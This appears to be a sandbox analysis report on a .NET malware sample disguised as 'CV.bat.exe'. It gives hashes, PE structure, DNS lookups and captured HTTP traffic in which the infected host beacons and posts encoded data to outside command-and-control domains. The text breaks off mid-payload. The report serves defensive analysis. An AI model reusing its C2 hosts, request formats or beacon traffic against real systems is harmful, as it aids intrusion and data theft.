Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....:c..............0..x..........:.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...@v... ...x.................. ..`.rsrc................z..............@..@.reloc..............................@..B........................H........^..(C......h....................................................{...."..}......{...."..}.......0..c........(........}.....(.............o....(.......{....o....t....(......{......;.............s.....o....&..0.............{.....o....& . ...;.....{.......i.o........i....,.....(...+...{.........,...{......oz......{......;.............s.....o....&..8.....o....(......(......{...........,...{.....o~....................8....j..{....o .....{....o!....*..0..)........{..

C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\CV.bat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.509383700052679
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	CV.bat.exe
File size:	885760
MD5:	40372d67f0de4526f04fba7948f7ff02
SHA1:	f1c8f97bd587125f6c48fb5e80bd191bff253a97
SHA256:	8bdbc254d871d5f2ffbdc50ea20070910cfa9c1be2b114ae1077ebc7b6d245d2
SHA512:	d36a06ed5e462d2020755028648889e2c78bf8749d853235b78ce76fdc0cda282ad17239635cc9b068cd050af3d9a7b07412552c91ac1baf7288c97e9b8fa183
SSDEEP:	12288:keOizpM7bMXqr4o/Yl6l01g6GhDPCd9+NrSrqLFmWK4HTN:zjFUbM6rP/Y4l0O/R8+NrS
TLSH:	9C15D02203E69B0EC1125334CDD3C3B0AFE84EA5E675C2874FDAFD5BB57B1AAA610145
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....:c..............0..x..........:.... ........@.. ....................................@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x4d963a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x633A84FE [Mon Oct 3 06:45:18 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xd95e8	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xda000	0x608	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xdc000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xd7640	0xd7800	False	0.6740739649796984	data	6.517176085689744	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xda000	0x608	0x800	False	0.33251953125	data	3.440385989209708	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xdc000	0xc	0x200	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0xda090	0x378	data
RT_MANIFEST	0xda418	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2022 15:57:12.286087990 CEST	49702	80	192.168.2.3	63.141.242.46
Oct 3, 2022 15:57:12.419805050 CEST	80	49702	63.141.242.46	192.168.2.3
Oct 3, 2022 15:57:12.419914007 CEST	49702	80	192.168.2.3	63.141.242.46
Oct 3, 2022 15:57:12.420093060 CEST	49702	80	192.168.2.3	63.141.242.46
Oct 3, 2022 15:57:12.553647041 CEST	80	49702	63.141.242.46	192.168.2.3
Oct 3, 2022 15:57:12.562021971 CEST	80	49702	63.141.242.46	192.168.2.3
Oct 3, 2022 15:57:12.562062979 CEST	80	49702	63.141.242.46	192.168.2.3
Oct 3, 2022 15:57:12.562361956 CEST	49702	80	192.168.2.3	63.141.242.46
Oct 3, 2022 15:57:12.562771082 CEST	49702	80	192.168.2.3	63.141.242.46
Oct 3, 2022 15:57:12.696178913 CEST	80	49702	63.141.242.46	192.168.2.3
Oct 3, 2022 15:57:25.916497946 CEST	49703	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:25.935096979 CEST	80	49703	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:25.935260057 CEST	49703	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:25.935497999 CEST	49703	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:25.955483913 CEST	80	49703	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:25.955503941 CEST	80	49703	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:25.955688000 CEST	49703	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:26.943219900 CEST	49703	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:28.015553951 CEST	49704	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:28.034276009 CEST	80	49704	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:28.034374952 CEST	49704	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:28.034595013 CEST	49704	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:28.053888083 CEST	80	49704	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:28.053917885 CEST	80	49704	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:28.054029942 CEST	49704	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:29.218669891 CEST	49704	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:30.578464031 CEST	49705	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:30.597194910 CEST	80	49705	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:30.597315073 CEST	49705	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:30.597460985 CEST	49705	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:30.616245985 CEST	80	49705	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:30.616281033 CEST	80	49705	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:30.616300106 CEST	80	49705	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:30.616317987 CEST	80	49705	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:30.616703987 CEST	80	49705	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:30.616743088 CEST	80	49705	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:30.616791964 CEST	49705	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:31.599716902 CEST	49705	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:32.615569115 CEST	49706	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:32.636198044 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.636320114 CEST	49706	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:32.636440039 CEST	49706	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:32.693151951 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.693193913 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.693223000 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.693254948 CEST	49706	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:32.693272114 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.693298101 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.693309069 CEST	49706	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:32.693330050 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.693355083 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.693378925 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.693391085 CEST	49706	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:32.693417072 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.693430901 CEST	49706	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:32.693453074 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.693833113 CEST	49706	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:32.714293957 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.714351892 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.714390993 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.714418888 CEST	49706	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:32.714466095 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.714504957 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.714545012 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.714561939 CEST	49706	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:32.714595079 CEST	49706	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:32.714620113 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.714658976 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.714689016 CEST	80	49706	91.195.240.94	192.168.2.3
Oct 3, 2022 15:57:32.714705944 CEST	49706	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:32.714802027 CEST	49706	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:32.714934111 CEST	49706	80	192.168.2.3	91.195.240.94
Oct 3, 2022 15:57:32.735672951 CEST	80	49706	91.195.240.94	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2022 15:57:12.124450922 CEST	57840	53	192.168.2.3	8.8.8.8
Oct 3, 2022 15:57:12.276463985 CEST	53	57840	8.8.8.8	192.168.2.3
Oct 3, 2022 15:57:17.571151972 CEST	57990	53	192.168.2.3	8.8.8.8
Oct 3, 2022 15:57:17.592390060 CEST	53	57990	8.8.8.8	192.168.2.3
Oct 3, 2022 15:57:18.610126972 CEST	52387	53	192.168.2.3	8.8.8.8
Oct 3, 2022 15:57:18.629693031 CEST	53	52387	8.8.8.8	192.168.2.3
Oct 3, 2022 15:57:19.663696051 CEST	56924	53	192.168.2.3	8.8.8.8
Oct 3, 2022 15:57:19.688312054 CEST	53	56924	8.8.8.8	192.168.2.3
Oct 3, 2022 15:57:20.697057009 CEST	60625	53	192.168.2.3	8.8.8.8
Oct 3, 2022 15:57:20.868271112 CEST	53	60625	8.8.8.8	192.168.2.3
Oct 3, 2022 15:57:25.890259981 CEST	49302	53	192.168.2.3	8.8.8.8
Oct 3, 2022 15:57:25.915287971 CEST	53	49302	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 3, 2022 15:57:12.124450922 CEST	192.168.2.3	8.8.8.8	0xc88	Standard query (0)	www.miarizzuto.org	A (IP address)	IN (0x0001)	false
Oct 3, 2022 15:57:17.571151972 CEST	192.168.2.3	8.8.8.8	0x7dfe	Standard query (0)	www.hipnoterapia.store	A (IP address)	IN (0x0001)	false
Oct 3, 2022 15:57:18.610126972 CEST	192.168.2.3	8.8.8.8	0x3ff5	Standard query (0)	www.hipnoterapia.store	A (IP address)	IN (0x0001)	false
Oct 3, 2022 15:57:19.663696051 CEST	192.168.2.3	8.8.8.8	0x2c9b	Standard query (0)	www.hipnoterapia.store	A (IP address)	IN (0x0001)	false
Oct 3, 2022 15:57:20.697057009 CEST	192.168.2.3	8.8.8.8	0x704b	Standard query (0)	www.hipnoterapia.store	A (IP address)	IN (0x0001)	false
Oct 3, 2022 15:57:25.890259981 CEST	192.168.2.3	8.8.8.8	0xc356	Standard query (0)	www.yaignars.site	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 3, 2022 15:57:12.276463985 CEST	8.8.8.8	192.168.2.3	0xc88	No error (0)	www.miarizzuto.org		63.141.242.46	A (IP address)	IN (0x0001)	false
Oct 3, 2022 15:57:17.592390060 CEST	8.8.8.8	192.168.2.3	0x7dfe	Name error (3)	www.hipnoterapia.store	none	none	A (IP address)	IN (0x0001)	false
Oct 3, 2022 15:57:18.629693031 CEST	8.8.8.8	192.168.2.3	0x3ff5	Name error (3)	www.hipnoterapia.store	none	none	A (IP address)	IN (0x0001)	false
Oct 3, 2022 15:57:19.688312054 CEST	8.8.8.8	192.168.2.3	0x2c9b	Name error (3)	www.hipnoterapia.store	none	none	A (IP address)	IN (0x0001)	false
Oct 3, 2022 15:57:20.868271112 CEST	8.8.8.8	192.168.2.3	0x704b	Name error (3)	www.hipnoterapia.store	none	none	A (IP address)	IN (0x0001)	false
Oct 3, 2022 15:57:25.915287971 CEST	8.8.8.8	192.168.2.3	0xc356	No error (0)	www.yaignars.site		91.195.240.94	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.miarizzuto.org

www.yaignars.site

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49702	63.141.242.46	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 3, 2022 15:57:12.420093060 CEST	114	OUT	GET /redb/?SrNH_=ZbLl4nlXWVx&WvMH=ClEE/ZchhSWI9Fw4wt/3uVHiPVKnhBdsoB1lL7XTwBZGLskW0dT3J+GyfBiSRlOqjq3/13+wQlUMF9TRa7Zw+CqEhvu+ka1r7A== HTTP/1.1 Host: www.miarizzuto.org Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 3, 2022 15:57:12.562021971 CEST	114	IN	HTTP/1.1 302 Found cache-control: max-age=0, private, must-revalidate connection: close content-length: 11 date: Mon, 03 Oct 2022 13:57:12 GMT location: http://survey-smiles.com server: nginx set-cookie: sid=47bcd440-4323-11ed-8f5c-7822bf2cf5b8; path=/; domain=.miarizzuto.org; expires=Sat, 21 Oct 2090 17:11:19 GMT; max-age=2147483647; HttpOnly Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 Data Ascii: Redirecting

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49703	91.195.240.94	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 3, 2022 15:57:25.935497999 CEST	117	OUT	POST /redb/ HTTP/1.1 Host: www.yaignars.site Connection: close Content-Length: 410 Cache-Control: no-cache Origin: http://www.yaignars.site User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.yaignars.site/redb/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 57 76 4d 48 3d 68 51 43 76 6a 79 52 34 69 48 37 57 37 50 4c 37 55 67 7a 45 72 67 32 41 54 57 33 4c 6c 6e 67 71 68 73 62 6d 56 63 54 41 64 63 31 4d 56 77 31 56 41 50 64 5f 65 6c 61 43 6f 50 41 6a 74 4f 66 56 53 2d 42 32 70 39 54 6f 74 41 41 67 55 65 6d 66 43 48 7a 61 75 2d 6f 57 6e 42 73 54 69 39 33 62 52 47 30 47 69 32 45 74 65 6a 63 51 69 55 6e 33 7e 52 64 4c 72 39 67 53 30 44 74 7a 57 7a 32 69 4e 4b 7a 65 49 35 54 77 71 67 76 4c 28 66 7e 6f 54 70 55 31 6d 50 6a 7a 34 6f 56 33 77 34 62 4f 33 36 37 47 66 78 74 2d 55 63 68 42 69 73 62 36 59 65 68 6c 72 72 47 30 56 73 61 57 33 41 6a 34 6e 59 52 73 34 51 76 5a 6d 54 52 31 43 4e 6f 4f 6c 35 6f 31 28 6c 50 61 35 32 41 31 57 65 75 5f 6b 59 5a 69 71 6f 39 66 55 6b 4d 30 4a 4f 41 77 79 4d 42 41 72 34 61 2d 65 76 62 45 51 6c 45 48 50 33 42 77 70 43 71 2d 31 44 50 53 32 73 6f 55 46 43 55 51 57 66 68 58 54 65 79 4e 45 56 53 51 38 76 28 48 68 30 45 52 71 41 30 33 64 55 75 4a 63 78 4f 77 42 4a 38 61 49 68 65 36 28 37 38 6c 65 66 37 62 4a 74 48 75 72 66 67 65 79 78 78 72 4b 4c 33 2d 41 76 6a 63 4f 78 51 34 67 73 70 6c 58 69 5a 6f 58 4f 45 53 6b 53 5a 71 57 65 44 76 41 61 38 51 6e 61 44 6b 49 77 42 48 55 7a 79 68 76 7a 42 49 37 65 56 6f 33 4b 69 48 64 6b 41 4e 52 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: WvMH=hQCvjyR4iH7W7PL7UgzErg2ATW3LlngqhsbmVcTAdc1MVw1VAPd_elaCoPAjtOfVS-B2p9TotAAgUemfCHzau-oWnBsTi93bRG0Gi2EtejcQiUn3~RdLr9gS0DtzWz2iNKzeI5TwqgvL(f~oTpU1mPjz4oV3w4bO367Gfxt-UchBisb6YehlrrG0VsaW3Aj4nYRs4QvZmTR1CNoOl5o1(lPa52A1Weu_kYZiqo9fUkM0JOAwyMBAr4a-evbEQlEHP3BwpCq-1DPS2soUFCUQWfhXTeyNEVSQ8v(Hh0ERqA03dUuJcxOwBJ8aIhe6(78lef7bJtHurfgeyxxrKL3-AvjcOxQ4gsplXiZoXOESkSZqWeDvAa8QnaDkIwBHUzyhvzBI7eVo3KiHdkANRg).
Oct 3, 2022 15:57:25.955483913 CEST	117	IN	HTTP/1.1 403 Forbidden date: Mon, 03 Oct 2022 13:57:25 GMT content-type: text/html transfer-encoding: chunked vary: Accept-Encoding server: NginX content-encoding: gzip connection: close Data Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49704	91.195.240.94	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 3, 2022 15:57:28.034595013 CEST	118	OUT	POST /redb/ HTTP/1.1 Host: www.yaignars.site Connection: close Content-Length: 186 Cache-Control: no-cache Origin: http://www.yaignars.site User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.yaignars.site/redb/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 57 76 4d 48 3d 68 51 43 76 6a 79 52 34 69 48 37 57 36 38 54 37 54 54 62 45 6a 41 32 41 62 32 33 4e 6c 6e 67 68 68 73 62 69 56 66 66 51 64 72 4a 4d 55 68 46 56 41 64 46 5f 64 6c 61 42 6e 76 41 5a 67 75 66 45 53 2d 42 51 70 39 66 6f 74 41 55 67 55 66 32 66 43 56 62 62 76 2d 70 77 30 78 73 55 7a 4e 33 4f 52 47 35 46 69 7a 38 74 65 68 55 51 69 48 66 33 39 44 31 49 67 39 67 58 33 44 74 34 64 54 32 75 4e 4b 7a 77 49 35 54 61 71 69 58 4c 38 76 75 6f 63 72 38 30 31 76 6a 79 37 6f 55 72 68 4e 32 57 78 4b 66 30 59 7a 6b 47 44 39 67 71 71 5f 44 77 46 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: WvMH=hQCvjyR4iH7W68T7TTbEjA2Ab23NlnghhsbiVffQdrJMUhFVAdF_dlaBnvAZgufES-BQp9fotAUgUf2fCVbbv-pw0xsUzN3ORG5Fiz8tehUQiHf39D1Ig9gX3Dt4dT2uNKzwI5TaqiXL8vuocr801vjy7oUrhN2WxKf0YzkGD9gqq_DwFA).
Oct 3, 2022 15:57:28.053888083 CEST	118	IN	HTTP/1.1 403 Forbidden date: Mon, 03 Oct 2022 13:57:28 GMT content-type: text/html transfer-encoding: chunked vary: Accept-Encoding server: NginX content-encoding: gzip connection: close Data Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49705	91.195.240.94	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 3, 2022 15:57:30.597460985 CEST	124	OUT	POST /redb/ HTTP/1.1 Host: www.yaignars.site Connection: close Content-Length: 5334 Cache-Control: no-cache Origin: http://www.yaignars.site User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.yaignars.site/redb/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 57 76 4d 48 3d 68 51 43 76 6a 79 52 34 69 48 37 57 37 63 6a 37 57 77 7a 45 6d 67 33 79 65 32 33 4e 28 58 67 74 68 73 58 69 56 63 54 41 64 65 52 4d 56 32 4a 56 41 5f 64 5f 66 6c 61 42 32 66 41 6a 74 4f 66 57 53 2d 56 6d 70 38 75 54 74 43 34 67 56 4e 7e 66 55 6c 62 61 67 2d 6f 58 31 78 73 54 73 64 33 4f 52 48 46 7a 69 33 6f 58 65 68 63 51 69 55 48 33 39 42 64 4c 68 74 67 53 34 6a 74 34 64 53 4b 68 4e 4b 7a 4b 49 35 37 4b 71 68 66 4c 7e 38 32 6f 65 36 38 31 38 66 6a 78 34 6f 55 34 74 6f 66 42 33 36 32 48 66 78 59 6c 55 61 6c 42 69 4d 62 36 5a 62 56 6c 6b 4c 47 31 59 38 61 56 33 42 66 47 6e 59 4a 73 34 52 62 57 6e 69 4a 31 44 74 34 4f 6d 61 41 32 71 6c 50 6d 79 57 42 74 45 65 79 67 6b 59 4a 6d 71 70 6c 66 55 51 55 30 49 5f 41 77 78 75 5a 41 76 59 61 36 65 76 62 31 64 46 49 65 50 33 63 6a 70 47 32 2d 31 30 76 53 33 2d 77 55 45 54 55 51 44 5f 68 57 55 65 79 49 45 56 53 79 38 76 4c 48 68 30 59 72 71 43 51 33 61 46 65 4a 4c 78 4f 78 4a 4a 38 64 57 78 65 57 37 37 39 55 65 63 58 68 4a 74 57 54 71 76 38 65 78 32 64 72 4b 63 44 2d 4e 66 6a 64 4c 78 51 35 67 73 6c 4b 58 69 31 4f 58 4b 51 53 6c 69 68 71 57 66 7a 76 4e 74 6f 51 6f 36 44 6c 43 51 41 6d 53 54 44 4b 68 43 4e 57 30 38 35 36 32 74 7e 54 55 57 42 6b 54 57 57 67 46 33 63 2d 47 4f 78 69 65 34 69 79 45 70 66 79 5a 64 38 64 39 31 69 63 65 63 33 4b 6c 42 74 4f 30 6d 32 66 31 42 68 56 6a 75 6e 71 58 67 31 2d 31 47 4c 35 65 30 6b 73 50 39 32 61 6c 69 69 36 4e 7a 42 6c 37 43 39 65 6c 4a 28 69 53 4b 68 4d 64 73 62 69 57 5a 75 4f 70 54 4c 4b 57 36 77 43 37 43 4d 4a 52 6c 69 64 7e 50 73 59 75 67 35 30 70 67 4e 35 34 52 5a 35 46 77 65 63 6c 4e 36 33 31 79 4d 6f 72 79 41 48 36 37 75 2d 6e 6c 38 41 78 51 34 38 31 61 56 61 68 47 71 53 6a 34 57 67 69 50 5a 66 74 74 55 6f 47 66 6f 4c 67 76 30 69 68 6b 57 51 4e 75 54 54 48 41 39 44 51 4f 59 37 32 73 6d 4e 74 61 68 35 39 45 70 48 7e 72 43 48 50 75 30 66 76 73 7e 69 61 43 30 32 62 6d 4f 78 31 43 69 47 61 4a 73 6c 6b 66 65 67 58 67 34 32 52 56 67 68 63 55 57 61 61 54 6f 54 52 55 37 64 58 77 47 37 50 32 76 75 4f 7a 58 57 37 6c 6e 66 4e 71 33 54 77 52 6b 56 65 41 47 2d 50 46 61 6b 6f 56 78 61 58 48 33 66 33 69 52 70 7e 77 4d 55 4e 32 4b 41 67 41 58 46 41 55 31 